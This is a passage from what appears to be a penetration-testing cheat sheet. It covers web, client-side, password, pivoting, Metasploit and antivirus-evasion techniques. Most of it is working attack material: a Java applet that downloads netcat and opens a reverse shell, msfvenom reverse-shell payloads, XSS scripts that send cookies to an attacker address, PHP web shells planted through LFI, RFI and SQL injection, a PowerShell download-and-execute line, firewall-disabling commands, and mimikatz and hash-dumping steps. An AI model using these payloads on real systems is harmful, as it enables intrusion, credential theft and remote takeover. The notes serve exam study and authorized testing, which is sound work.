/pth:31d6cfe0d16ae931b73c59d7e0c089c0 /v:192.168.1.23 # PTH method ``` Checking firewall rules: ```cmd # Deprecated firewall command netsh firewall set opmode mode=disable exceptions=disable # disable firewall, requires priv # Newer advfirewall netsh advfirewall set currentprofile state off # disable firewall, requires priv netsh advfirewall firewall show rule name=all | find "Rule Name:" | find "NameLookingFor" # search for a rule ``` Finding a file ```cmd dir /s proof.txt # /s recursive dir /s /a proof.txt # /s recursive, /a attributes (show all hidden and system files as well) ``` Finding strings ```cmd findstr /i "hello" filename # /i for ignore case findstr /si "hello" # /i for ignore case, /s for recursive ``` Opening a file in notepad (requires GUI): ```cmd start notepad filename ``` Shortnames when changing directories or during directory path traversal: ```cmd # C:\Program Files\A Pro Gram\ # 6 first chars + ~1 cd C:\PROGRA~1\APROGR~1\ ``` Finding Windows version with only hard drive access: ```cmd type C:\Windows\System32\eula.txt ``` # Client Side Attacks ## Know Your Target ### Passive Client Information Gathering Find information online about the target, such as browser version from websites that collect user agent data. ### Active Client Information Gathering Social engineering, calling the company as a support technician in an attempt to extract useful information from the person on the other side of the line. Or sending them an email, with hope for a response or a link click, that would enumerate the user's browser version and installed extensions. ## MS12-037 - Internet Explorer 8 Fixed Col Span ID https://www.exploit-db.com/exploits/24017/ Host the malicious page and visit it. Bind shell open on port 4444. To swap out shellcode, ensure the new shellcode is of the same size as the exploit apparently bypasses ASLR and DEP, and it also mentions it will be more reliable if it was the same size. For that, generate the following Windows reverse shell, in Javascript unicode format, with no encoding: ```sh msfvenom -p windows/shell_reverse_tcp LHOST=[kali ip] LPORT=443 -f js_le -e generic/none ``` Since the payload is 18 bytes smaller, pad it with 18 NOPs: `%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090` ## Java Signed Applet Attack Java.java ```java import java.applet.*; import java.awt.*; import java.io.*; import java.net.URL; import java.util.*; /** * Author: Offensive Security * This Java applet will download a file and execute it. **/ public class Java extends Applet { private Object initialized = null; public Object isInitialized() { return initialized; } public void init() { Process f; try { String tmpdir = System.getProperty("java.io.tmpdir") + File.separator; String expath = tmpdir + "evil.exe"; String download = ""; download = getParameter("1"); if (download.length() > 0) { // URL parameter URL url = new URL(download); // Get an input stream for reading InputStream in = url.openStream(); // Create a buffered input stream for efficency BufferedInputStream bufIn = new BufferedInputStream(in); File outputFile = new File(expath); OutputStream out = new BufferedOutputStream(new FileOutputStream(outputFile)); byte[] buffer = new byte[2048]; for (;;) { int nBytes = bufIn.read(buffer); if (nBytes <= 0) break; out.write(buffer, 0, nBytes); } out.flush(); out.close(); in.close(); f = Runtime.getRuntime().exec("cmd.exe /c " + expath + " 192.168.1.23 443 -e cmd.exe"); // change to Kali IP } } catch(IOException e) { e.printStackTrace(); } /* ended here and commented out below for bypass */ catch (Exception exception) { exception.printStackTrace(); } } } ``` ```sh javac -source 1.7 -target 1.7 Java.java # compile to class echo "Permissions: all-permissions" > /root/manifest.txt jar cvf Java.jar Java.class # compress class into jar keytool -genkey -alias signapplet -keystore mykeystore -keypass mykeypass -storepass password123 jarsigner -keystore mykeystore -keypass mykeypass -storepass password123 -signedjar SignedJava.jar Java.jar signapplet mv Java.class SignedJava.jar /var/www/html/ echo '<applet width="1" height="1" id="Java Secure" code="Java.class" archive="SignedJava.jar"><param name="1" value="http://192.168.1.23:80/evil.exe"></applet>' > /var/www/html/java.html cp /usr/share/windows-binaries/nc.exe /var/www/html/evil.exe ``` # Web Application Attacks ## Essential Firefox Add-ons * Cookie Manager+ * Tamper Data ## XSS ### Browser Redirection and IFRAME Injection Forcing a victim to visit a webpage. Use an IFRAME as it is stealthy. This redirection may be used to redirect a victim browser to a client side attack or to an information gathering script. Listen for the connection: `nc -lvp 80` ```html <iframe SRC="http://[your ip]/report" height="0" width="0"></iframe> ``` Tools: * User Agent Parser: https://developers.whatismybrowser.com/useragents/parse/#parse-useragent (for exploiting outdated clients) ### Stealing Cookies and Session Information #### GET Request ```html <script>new Image().src="http://[your ip]/bogus.php?output="+document.cookie;</script> ``` #### POST Request ```html var http = new XMLHttpRequest();var url = "/flatfilelogin/shout.php";var params = "input_name=stolen&input_text=" + document.cookie;http.open("POST", url, true);http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");http.send(params); ``` ## File Inclusion ### Local File Inclusion (LFI) Ability to "include" any local file in the filesystem and execute PHP code within the included files. Vulnerability: ```php if (isset( $_GET['LANG'] ) ) { $lang = $_GET['LANG'];} else { $lang = 'en';} include( $lang . '.php' ); ``` With this, you can access files that are on the system by changing the value of the `LANG` attribute and using directory path traversal. But notice in the vulnerable code, it appends `.php` to the end, to bypass that in PHP versions below 5.3, use a null byte (`%00`): ``` LANG=../../../../../../../../windows/system32/drivers/etc/hosts%00 ``` If we could get PHP code written to somewhere on the server filesystem, we can get a shell. Assuming, we can't directly upload a file to the remote filesystem, we can contaminate log files to include PHP code: ```sh $ nc 192.168.1.23 80 <?php echo shell_exec($_GET['cmd']);?> HTTP/1.1 400 Bad Request ``` This connection results in the following text written to the Apache log files located in `C:\xampp\apache\logs\access.log`, effectively introducing PHP code into a file on the local filesystem of the webserver: ``` 192.168.1.23 - - [17/Apr/2013:06:22:00 -0400] " <?php echo shell_exec($_GET['cmd']);?>" 400 1047 ``` Let's try including that log file and executing the malicious PHP code stored within it, by putting the pathname into the `LANG` attribute, and putting `ipconfig` in the `cmd` attribute: ``` http://192.168.1.23/addguestbook.php?name=hi&comment=&cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00 ``` The result may be a little hard to see, as the entire log file will be dumped along with the command's output. Let's get a shell now by transferring over "nc.exe" to the webserver using the TFTP technique. First, start the TFTP server on the attacker machine with `atftpd --daemon --port 69 /tftp` and copying "nc.exe" over to the hosting directory with `cp /usr/share/windows-binaries/nc.exe /tftp`. Now execute the `tftp` on the webserver using LFI. Remember to URL encode the command string within the "cmd" attribute: ``` http://192.168.1.23/addguestbook.php?name=hi&comment=&cmd=tftp+-i+[kali ip]+get+nc.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00 ``` The webpage will start to hang for a while, as it awaits the output from the `tftp` command that is downloading "nc.exe". Once done, execute the downloaded "nc.exe" and create a reverse shell: ``` http://192.168.1.23/addguestbook.php?name=hi&comment=&cmd=nc.exe+[kali ip]+[port]+-e+cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log%00 ``` #### LFI Summary ##### Techniques ``` param=/etc/passwd param=/etc/passwd%00 # null byte terminate param=../../../../../../etc/passwd%00 # directory traversal param=php://filter/convert.base64-encode/resource=/etc/php5/apache2/php.ini%00 # filter, for files that contain bad chars PHP cannot interpret param=expect://whoami # expect wrapper, direct code execution, not enabled by default param=php://input # php code execution, send php code in POST data `<? system('wget http://192.168.183.129/php-reverse-shell.php -O /var/www/shell.php');?>` param=/proc/self/environ # if readable, write php code in "User Agent" data, and it'll appear within environ param=/proc/self/fd/0 # if readable, write php code in "referer" data, and it'll appear within file descriptor. make sure to brute force the fd number 0-10+ param=/var/lib/php/session # php sessions param=/tmp/ # php sessions ``` Also phpinfo() pages can be exploited in LFI as well. phpinfo() script contains the values of PHP variables, INCLUDING any values set via GET, POST or uploaded FILES. Creating tmp files, getting the location of them, and performing LFI on them leads to code execution. https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf ##### Log Poisoning ``` # Default Locations RHEL / Red Hat / CentOS / Fedora Linux Apache log file location /var/log/httpd/access_log /var/log/httpd/error_log Debian / Ubuntu Linux Apache log file location /var/log/apache2/access.log /var/log/apache2/error.log FreeBSD Apache log file location /var/log/httpd-access.log /var/log/httpd-error.log # For custom log locations, find the "CustomLog" and "ErrorLog" definitions within these files: /usr/local/etc/apache2/httpd.conf /etc/apache2/apache2.conf /etc/httpd/conf/httpd.conf # Windows web roots C:/xampp/htdocs/ C:/wamp/www/ C:/Inetpub/wwwroot/ ``` #### `fimap` ```sh fimap -s -u 'http://192.168.1.23/classes/phpmailer/class.cs_phpmailer.php?classes_dir=' ``` ### Remote File Inclusion (RFI) Ability to "include" remote files and execute PHP code within the included files. Easier to exploit, but less common than LFIs. Just like getting a shell with LFI, start the TFTP server and prepare "nc.exe". Also, prepare a malicious file called "evil.txt" and host it within the attacker's webserver and start apache with `service apache2 start`: ``` <?php echo shell_exec("tftp -i [kali ip] get nc.exe");?> ``` Call the webpage to include "evil.txt" and execute the PHP code within it to download "nc.exe" from our machine using `tftp`. It may take a sec to download: ``` http://192.168.1.23/addguestbook.php?name=hi&comment=&LANG=http://[kali ip]/evil.txt%00 ``` Change "evil.txt" on the attacker's webserver to invoke the `nc.exe` command: ```php <?php echo shell_exec("nc.exe [kali ip] [port] -e cmd.exe");?> ``` Prepare a listener and refresh the webpage to pop a reverse shell. #### RFI Summary Alternatively, to avoid constantly changing the php file, host this instead, and visit `http://192.168.1.23/addguestbook.php?name=hi&comment=&LANG=http://[kali ip]/evil.txt%00&cmd=whoami`. Change `cmd` to the command you want to execute: ```php <?php echo shell_exec($_GET['cmd']);?> ``` ``` # Data wrapper allows for direct code execution param=data:text/plain,<?system($_GET['x']);?>&x=whoami param=data:,<?system($_GET['x']);?>&x=whoami param=data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls ``` ### SQL #### Simple Authentication Bypass ```sql select * from users where name='?' and password='?'; select * from users where name='wronguser' or 1=1;#' and password='?'; select * from users where name='wronguser' or 1=1 limit 1;#' and password='?'; # when server expects 1 result ``` #### Database Enumeration and Extraction ```sql select * from comments where id=?; select * from comments where id=738'; # test for sql injection select * from comments where id=738 order by 6; # enumerate number of columns select * from comments where id=738 union select 1,2,3,4,5,6; # union select with same number of columns, to see which numbers gets printed on webpage select * from comments where id=738 union select 1,2,3,4,@@version,6; # discover MySQL version select * from comments where id=738 union select 1,2,3,4,user(),6; # discover current user being used for db connection select * from comments where id=738 union select 1,2,3,4,table_name,6 from information_schema.tables; # dump all tables and find interesting one select * from comments where id=738 union select 1,2,3,4,column_name,6 from information_schema.columns where table_name='users'; # dump all column names from that table select * from comments where id=738 union select 1,2,3,4,concat(name,0x3a,password),6 from users; # dump users information. 0x3a can be substituted with ':' ``` #### Reading Files with SQLi ```sql select * from comments where id=738 union select 1,2,3,4,load_file('c:/windows/system32/drivers/etc/hosts'),6; ``` #### Writing Files with SQLi ```sql select * from comments where id=738 union select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into outfile 'c:/xampp/htdocs/backdoor.php'; ``` ``` 192.168.1.23/backdoor.php?cmd=ipconfig ``` #### MSSQL Xp_Cmdshell and Dumping ```sh nmap -T4 -n -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=abc,ms-sql-xp-cmdshell.cmd='whoami' 192.168.1.23 # command execution nmap -T4 -n -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.password=abc 192.168.1.23 # dump tables information nmap -T4 -n -p 1433 --script ms-sql-query --script-args mssql.username=sa,mssql.password=abc,mssql.database=bankdb,ms-sql-query.query="select * from tblCustomers;" 192.168.1.23 # sql query ``` #### MySQL CLI Low-priv shells may not be interactive, so remember to use `-e` to execute SQL queries: ```sh mysql -uroot -pzaq1xsw2cde3 -e 'show databases;' mysqladmin -u root password YOURNEWPASSWORD # resetting root password, good for post exploitation, may not work all the time ``` Unlike MSSQL, MySQL can't directly execute commands, but with UDF (user defined funtion), command execution will be possible. * mysqladmin -u root password YOURNEWPASSWORD * https://www.rapid7.com/db/modules/exploit/multi/mysql/mysql_udf_payload * http://bernardodamele.blogspot.sg/2009/01/command-execution-with-mysql-udf.html * https://hackmag.com/security/hacking-mysql-databases-methods-and-tools/ #### Oracle Four things to connect to an Oracle DB: 1. IP 2. Port 3. Service Identifier (SID) (Database) 4. Username/Password 1. Determine Oracle version * nmap * auxiliary/scanner/oracle/tnslsnr_version 2. Determine Oracle SID * oscanner * auxiliary/scanner/oracle/sid_enum * auxiliary/scanner/oracle/sid_brute 3. Guess/Bruteforce User/Pass * oscanner * auxiliary/scanner/oracle/oracle_login 4. Privilege Escalation via PL/SQL Injection * auxiliary/sqli/oracle/lt_findricset_cursor 5. Manipulate Data/Post Exploitation 6. Cover Tracks Resources: * Oracle Hacking Methodology with Metasploit: http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf * Sqlplus and code execution example: https://www.adampalmer.me/iodigitalsec/2013/08/12/first-steps-in-oracle-penetration-testing/ * Setting up Oracle in Kali: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux (felt troublesome, didn't install) * Setting up Oracle in Kali 2.0: https://blog.zsec.uk/msforacle/ Tools: * Oscanner: https://tools.kali.org/vulnerability-analysis/oscanner * `oscanner -s 192.168.1.23 -P 1521` * DBPwAudit: https://tools.kali.org/vulnerability-analysis/dbpwaudit #### Other Notes ### Web Application Proxies * Firefox > Alt > Tools > Tamper Data > Start Tamper * BurpSuite #### BurpSuite Wonderful tool, great for SQLi, RFI, LFI, remote code execution, and nearly all web attacks. * Proxy * Repeater * Ctrl-r to send request to repeater * Ctrl-g to go in repeater, manually set in User Options (Tab) > Misc > Hotkeys > Edit hotkeys > Issue Repeater request > Ctrl-g * Ctrl-u to URL encode ### Automated SQL Injection Tools ```sh sqlmap -u http://192.168.1.23 --crawl=1 # crawls link with depth 1 and automatically find GET SQLi sqlmap -u http://192.168.1.23/comment.php?id=738 --dbms=mysql --dump --threads=5 sqlmap -u http://192.168.1.23/comment.php?id=738 --dbms=mysql --os-shell sqlmap -u http://192.168.1.23/login.php --data='username=john&password=smith' # POST using data sqlmap -r login_request -p username,password # POST, using a BurpSuite request ``` # Password Attacks ## Preparing for Brute Force ### Dictionary Files `/usr/share/wordlists/` ### Key-space Brute Force ```sh crunch 6 6 0123456789ABCDEF -o crunch1.txt # length 6 0-9A-F crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt # length 4 a-zA-Z crunch 0 0 -p test ing 123 # crunch will find all combinations of those 3 words, eg. 123ingtest ``` If a pattern is found within passwords you cracked like: ``` david: Abc$#123 mike: Jud()666 Judy: Hol&&278 ``` We can generate a customized password list: ``` # @ - Lower case alpha characters # , - Upper case alpha characters # % - Numeric characters # ^ - Special characters including space crunch 8 8 -t ,@@^^%%% # this will generate 160GB of data ``` ### Pwdump and Fgdump Password Hash Types in Security Accounts Manager (SAM) Database: * LAN Manager (LM) * DES * Windows NT-2003 * Passwords longer than 7 chars split into two strings and is hashed separately * Passwords converted to uppercase before hashing * No salt * NT LAN Manager (NTLM) * MD4 * Windows Vista+ * No limit to two 7 char parts * Case sensitive * No salt SAM db cannot be copied while OS is running, however in-memory attacks to dump the hashes can be mounted using various techniques. Pwdump and fgdump are good examples of tools that are able to perform in-memory attacks, as they inject a DLL containing the hash dumping code into the Local Security Authority Subsystem (LSASS) process, which has the necessary privileges to extract the hashes. Fgdump and pwdump are similar, but fgdump attempts to kill local AV before attempting to dump the hashes and handle cached passwords and protected storage data as well. http://foofus.net/goons/fizzgig/ ```cmd fgdump.exe ``` You can crack them online at http://cracker.offensive-security.com/ or use `john [hashes]` on Kali. ``` Jason:502:aad3c435b514a4eeaad3b935b51304fe:c46b9e588fa0d112de6f59fd6d58eae3::: [username]:[relative identifier (500 - admin, 502 - kerboros)]:[LM hash]:[NT hash] ``` ### Windows Credential Editor (WCE) WCE can steal NTLM credentials from memory and dump cleartext passwords stored by Windows authentication packages installed on the target system such as msv1_0.dll, kerberos.dll, and digest.dll. ```cmd wce -l # default, dumps NTLM hashes fromm LSASS process memory, more secure in terms of OS stability wce -w # dumps plaintext passwords using DLLs ``` https://www.ampliasecurity.com/research/windows-credentials-editor/ ### mimikatz ``` privilege::debug # Dump Passwords sekurlsa::logonpasswords # Passing the Hash sekurlsa::pth /user:Administrator /domain:{domain name, eg. winxp} /ntlm:{ntlm hash here} /run:cmd # krbtgt hash (Domain Controller) lsadump::dcsync /user:krbtgt lsadump::lsa /inject /name:krbtgt ``` ### More Active Directory * mimikatz (meterpreter modules) * mimikatz (manual lsadump) * `post/windows/gather/smart_hashdump` * `post/windows/gather/credentials/gpp` or `cd "C:\Windows\SYSVOL" && dir /s Groups.xml` then `gpp-decrypt [cpassword]` on Kali * `post/windows/escalate/golden_ticket` #### 14.1.4.1 - Passing the Hash (PTH) Authenticate using a NT/LM hash instead of the plaintext password, saving time and effort. Refer to SMB enumeration section: * `CrackMapExec` * `smbmap` * `smbclient` * `pth-winexe` * `exploit/windows/smb/psexec` ### Password Profiling with `cewl` and `john` ```sh cewl www.conglomerate.com -m 6 -w conglomerate-cewl.txt # scrape and generate password list from words found # Add two numbers to the end of each password # $[0-9]$[0-9] # add this line to /etc/john/john.conf to mutate our dictionary with 2 appended digits john --wordlist=conglomerate-cewl.txt --rules --stdout > mutated.txt ``` ## Online Password Attacks #### 14.2.1.1 - `medusa` ```sh medusa -d # list modules. modules available: cvs, ftp, http, imap, mssql, mysql, nntp, pcanywhere, pop3, postgres, rdp, rexec, rlogin, rsh, smbnt, smtp-vrfy, smtp, snmp, ssh, svn, telnet, vmauthd, vnc, web-form, wrapper medusa -h 192.168.1.23 -u admin -P password-file.txt -M http -m DIR:/admin -T 20 # http brute force password medusa -h 192.168.1.23 -p admin -U user-file.txt -M http -m DIR:/admin -T 20 # http brute force username ``` #### 14.2.1.2 - `ncrack` ```sh # Modules available: FTP, SSH, Telnet, HTTP(S), POP3(S), SMB, RDP, VNC, SIP, Redis, PostgreSQL, MySQL ncrack -vv --user offsec -P password-file.txt rdp://192.168.1.23 # rdp brute force password ncrack -vv --password offsec -U user-file.txt rdp://192.168.1.23 # rdp brute force username ``` Due to the way RDP works, multiple threads are not practical in this case, which makes the brute force process rather slow. #### 14.2.1.3 - `hydra` ```sh # Modules available: adam6500, asterisk, cisco, cisco-enable, cvs, firebird, ftp, ftps, http[s]-{head|get|post}, http[s]-{get|post}-form, http-proxy, http-proxy-urlenum, icq, imap[s], irc, ldap2[s], ldap3[-{cram|digest}md5][s], mssql, mysql, nntp, oracle-listener, oracle-sid, pcanywhere, pcnfs, pop3[s], postgres, radmin2, rdp, redis, rexec, rlogin, rpcap, rsh, rtsp, s7-300, sip, smb, smtp[s], smtp-enum, snmp, socks5, ssh, sshkey, svn, teamspeak, telnet[s], vmauthd, vnc, xmpp hydra -vV -l root -P password-file.txt 192.168.1.23 ftp # ftp brute force password hydra -vV -p root -L user-file.txt 11.11.1.219 ftp # ftp brute force username hydra -vV -l root -P password-file.txt 192.168.1.23 ssh # ssh brute force password hydra -vV -l root -P fasttrack.txt -M hosts -o bruteforce ssh # ssh brute force password of multiple hosts and output to file hydra -vV -f -P password-file.txt 192.168.1.23 snmp # snmp brute force password, stop when found hydra -vV -f -C userpass.txt 192.168.1.23 ftp # ftp brute force login, using [user]:[pass] file, stop when found hydra -vV -f -l admin -P [pw dict] -t [threads] -o [output] -s [port] [host] http-get [page (/camera.cgi)] hydra -vV -f -l admin -P [pw dict] -t [threads] -o [output] -s [port] [host] http-form-post "[post page]:[post data]:[failed attempt regex]" hydra -vV -f -l admin -P /usr/share/dirb/wordlists/small.txt -t 50 -o login-brute-force 192.168.1.23 http-form-post "/index.php:target=auth&mode=login&user_login=^USER^&password=^PASS^:The username or password you entered is invalid" hydra -e nsr # n - check for null password, s - use the same username as the password, r - reverses the username and uses it as password. total +3 more requests ``` #### 14.2.1.5 - Account Lockouts and Log Alerts Online password brute-force attacks are noisy. Generates logs, warnings, may even lock out accounts. Could be disastraous as valid users may be unable to access the service until admin re-enables their account. ### Choosing the Right Protocol: Speed vs Reward Speed up brute-force by increasing number of threads, however, doesn't work on certain protocols like RDP and SMB. And on of that, RDP authentication negotiations are more time consuming than say HTTP. However even if it is slower, a successful attack on RDP would often provide a bigger reward. The hidden art behind online brute-force attacks is choosing your targets, user lists, and password files carefully and intelligently before intiating the attack. ## Password Hash Attacks ### Identifying a Hash ```sh $ hash-identifier ... ------------------------------------------------------------------------- HASH: c43ee559d69bc7f691fe2fbfe8a5ef0a Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username))) ``` ### John the Ripper ```sh john [hash.txt] # brute force john -wordlist:/usr/share/wordlists/rockyou.txt [hash.txt] # dictionary john -rules -wordlist:/usr/share/wordlists/rockyou.txt -format:nt [hash.txt] # dictionary + john's mangle rules john -show -format:nt [hash.txt] # rmb to include the format when showing unshadow passwd shadow > unshadow.txt # combine them john -rules -wordlist:/usr/share/wordlists/rockyou.txt [unshadow.txt] # dictionary + john's mangle rules ``` # Port Redirection and Tunneling ## Local Port Forwarding Opens a local port that forwards all traffice headed to that port to the destination ```sh # Alice:8080 -> Bob:22 -> Bob:80 # On Alice ssh root@bob -f -N -L 8080:localhost:80 # perspective of server, localhost is the SSH server itself, Bob ``` ```sh # Alice:8080 -> Bob:22 -> Charlie:3389 # On Alice ssh root@bob -f -N -L 8080:charlie:3389 # perspective of server ``` ## Remote Port Forwarding Opens a remote port that forwards all traffic headed to that port to the destination ```sh # Alice:8080 -> Bob:22 -> Bob:80 # On Bob ssh root@alice -f -N -R 8080:localhost:80 # perspective of initiator, Bob ``` ```sh # Alice:8080 -> Bob:22 -> Charlie:3389 # On Bob ssh root@alice -f -N -R 8080:charlie:3389 # perspective of initiator, Bob ``` ## Pivoting ### Dynamic Port Forwarding and Proxychains Opens a local port that forwards all traffic headed to that port to the destination machine, essentially allowing you to access new networks that are not directly accessible, and perform tasks such as nmap scanning without the need of installing nmap on the pivot host. ```sh # Alice:8080 -> Bob:22 -> Bob & Charlie's Network:0-65535 # On Alice ssh root@bob -D 8080 echo '[ProxyList]' > proxychains.conf echo 'socks5 127.0.0.1 8080' >> proxychains.conf proxychains nmap -T4 -n -Pn -sT -F -p 80 charlie ``` IMPORTANT NOTE on Proxychains and Nmap: * Use `-sT -Pn` when proxychaining nmap! * ICMP (nmap host detection), UDP, nmap OS detection and non-fully established TCP connections (nmap SYN scan) will not work through proxychain, and will result in leakage, meaning your connections will go through as if without having a proxy at all, including revealing your IP address. * Why didn't proxychain work with nmap in the OffsecVM, but works on main Kali box? OffsecVM -> running proxychain nmap as ROOT -> defaults to SYN scan -> proxychain fails to establish SOCKS connection. Main Kali -> running proxychain nmap as non-privileged user -> defaults to TCP scan -> proxychain successfully establishes SOCKS connection. * No SYN scans, ICMP, UDP and OS detection: https://security.stackexchange.com/a/122562 * Nmap and proxychains: https://ntu-offsec.github.io/blog/articles/nmap-proxychains/ * ICMP/pings will not work with SOCKS proxy, as SOCKS is on layer 5 that acts as a proxy for TCP and UDP connections, of which ICMP requests are not. https://superuser.com/a/1030803 Resources: * Guide: https://netsec.ws/?p=278 * plink, Windows ssh equivalent: `/usr/share/windows-binaries/plink.exe` * 3proxy, Windows SOCKS Proxy Server: https://forums.offensive-security.com/showthread.php?3196-15-5-1-2&p=42285#post42285 https://github.com/z3APA3A/3proxy * IE does not proxy DNS requests!: https://forums.offensive-security.com/showthread.php?3196-15-5-1-2&p=42285#post42285 ### Pivoting with Metasploit If you (192.168.1.23) compromised a host with two NICs (192.168.1.23, 10.1.1.251) on session 1, simply use `route add` and now you can target that range. ``` msf > route add [subnet] [netmask] [session] # alternatively, `use post/windows/manage/autoroute` (module), or `run autoroute` (meterpreter) msf > route add 10.1.1.0 255.255.255.0 1 msf > route print msf > use auxiliary/scanner/http/http_version msf auxiliary(http_version) > set RHOSTS 10.1.1.0/24 ``` Once routes are established, Metasploit modules can access the IP range specified in the routes. Scans and exploits can be directed at machines that would otherwise be unreachable from the outside, via the sessions established. For other applications to access the routes, a little bit more setup is necessary. This involves setting up the Socks4a Metasploit module and using Proxychains in conjunction with the other applications. ``` msf > use auxiliary/server/socks4a msf auxiliary(socks4a) > set SRVHOST 127.0.0.1 msf auxiliary(socks4a) > set LPORT 1080 msf auxiliary(socks4a) > exploit -j echo '[ProxyList]' > proxychains.conf echo 'socks4 127.0.0.1 1080' >> proxychains.conf proxychains nmap -T4 -n ... ``` Want to add the route as a default route? Meaning without proxychains, traffic headed towards the remote network will be routed automatically. ``` msf > use post/multi/manage/autoroute msf post(autoroute) > set SESSION session-id msf post(autoroute) > set CMD default msf post(autoroute) > exploit # or meterpreter > run post/multi/manage/autoroute CMD=default ``` Resources: * Autoroute, with socks4a, proxychains and default route: https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/manage/autoroute.md * Pivoting multiple networks: https://pentest.blog/explore-hidden-networks-with-double-pivoting/ * LPF, RPF, and DPF (Metasploit) scenario examples: https://www.cybrary.it/0p3n/pivot-network-port-forwardingredirection-hands-look/ * Paper with examples: https://www.sans.org/reading-room/whitepapers/testing/tunneling-pivoting-web-application-penetration-testing-36117 * Metasploit Unleashed Pivoting (Autoroute): https://www.offensive-security.com/metasploit-unleashed/pivoting/ * Metasploit Unleashed ProxyTunnels (Autoroute + Socks4a): https://www.offensive-security.com/metasploit-unleashed/proxytunnels/ ## HTTP Encapsulation ```sh # Client:7070 -> Server:8080 -> Server:22 # On Server hts -F localhost:22 8080 # On Client htc -F 7070 192.168.161.159:8080 ssh root@localhost:7070 ``` Wireshark inspection reveals normal SSH session packets are identified as "Encrypted packets" and have "SSL Protocol" fields in them. After using HTTPTunnel, the packets no longer show those, and look like ordinary TCP packets. * HTTPTunnel - https://tools.kali.org/maintaining-access/httptunnel # Metasploit ### Starting ```sh # PostgreSQL service postgresql start # PostgreSQL manual start sudo -H -u postgres bash -c "/usr/lib/postgresql/9.6/bin/postgres -D /var/lib/postgresql/9.6/main -c config_file=/etc/postgresql/9.6/main/postgresql.conf" # Starting msfconsole msfconsole ``` Note, after installing either neovim or samba-4.5.15, postgresql service scripts stops working. ### Usage ```sh # Searching for Modules search [module] serach type:auxiliary [module] grep [keyword] search [module] # Module Usage use [module] info show options set rhost [ip] set rhosts [ips/range] # for modules that support multiple hosts setg rhosts [ips/range] # global/persistent set set threads 10 # for modules that support threads set payload windows/meterpreter/reverse_tcp # optional, meterpreter is default show targets set target 1 # optional, 0 is default set InitialAutoRunScript migrate -f # migrate immediately after getting shell. good for client-side attacks, since victim may close the browser set EnableStageEncoding true # "Command shell session 1 closed. Reason: Died from Errno::ECONNRESET"? disable encoding. set to true, its a bug (https://github.com/rapid7/metasploit-framework/issues/8357) set StageEncoder "generic/none" # disable encoding. exploit # Multi Handler use exploit/multi/handler set payload windows/meterpreter/reverse_tcp # required especially for staged payloads (meterpreter and shell/etc.) set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j # Job Handling (when using exploit -j) jobs # list jobs -k 1 # kil # Session Handling sessions # list sessions -i 1 # interact sessions -u 1 # upgrade shell to meterpreter sessions -k 1 # kill # Workspaces workspace workspace -a lab workspace lab workspace -d test db_export -f xml /tmp/ms.xml db_import /tmp/ms.xml # Database hosts db_nmap -T4 ... services -p 443 services -p 443 -R # populate RHOSTS with result hosts -c address,os_flavor -S Linux # 2 columns, search Linux services -c name,info -S http -R # 2 columns, search http, and populate RHOSTS with results creds creds -a 192.168.1.23 -p 22 -u root -P toor loot ``` ### Explored Modules ``` # Auxiliary auxiliary/scanner/snmp/snmp_enum auxiliary/scanner/smb/smb_version auxiliary/scanner/http/webdav_scanner # apparently WebDAV servers are often poorly cofigured and can often lead to quick and easy shell auxiliary/scanner/ftp/ftp_login # Exploits exploit/windows/smb/ms08_067_netapi exploit/windows/smb/ms17_010_eternalblue ``` ### Common Payloads #### Staged Payload 2 parts, great when there is little buffer space for shellcode. Requires multi handler to send stage 2. Meterpreter is always staged. ``` [platform]/[arch?]/[shell/meterpreter]/[reverse/bind]_[protocol] windows/meterpreter/reverse_https linux/x86/shell/reverse_tcp ``` #### Non-Staged/Singles Payloads Entire shellcode in payload ``` [platform]/[arch?]/[shell]_[reverse/bind]_[protocol] windows/shell_reverse_tcp linux/x86/shell_reverse_tcp ``` ### Meterpreter ``` sysinfo getuid search -f *pass*.txt download c:\\users\\bob\\passwords.txt /tmp upload /tmp/nc.exe c:\\ hashdump getsystem migrate [pid] # migrate to another process, as exploited process may hung (eg. during client-side attacks) or get killed shell # advantage is if shell dies, you can go back up to meterpreter to spawn a new one ``` ``` use exploit/windows/local/service_permissions set session 1 exploit ``` ### Executable Payloads ```sh msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.23 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o shell.exe msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.23 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -o shell.exe -x /usr/share/windows-binaries/plink.exe -k # embed with existing program, and allow it to continue functionality with -k (spawn new thread) msfvenom -p linux/x86/exec CMD=/bin/sh -f elf -o gimmeshell ``` ### Custom MSF Module Create in local directory, eg. `~/.msf4/modules/exploits/linux/misc`. Copy an existing template over like `/usr/share/metasploitframework/modules/exploits/linux/misc/gld_postfix.rb`. Change template, main part is `exploit` function. ### Unicorn Powershell Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory, potentially evading firewalls. ```sh # On Kali: ./unicorn.py [metasploit payload] [reverse_ip] [port] # generates powershell_attack.txt (actual output) and unicorn.rc (metasploit setup script) # delete the "powershell" wrapper and quotes around the text in powershell_attack.txt python -m SimpleHTTPServer # On Windows: powershell "IEX(New-Object Net.WebClient).downloadString('http://[kali ip]:8000/powershell_attack.txt')" # download and execute the powershell code # On Kali: # set up listener ``` # Bypassing Antivirus Software ```sh msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.23 LPORT=4444 -f exe -o shell.exe # 30/46 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.23 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell.exe # 34/46 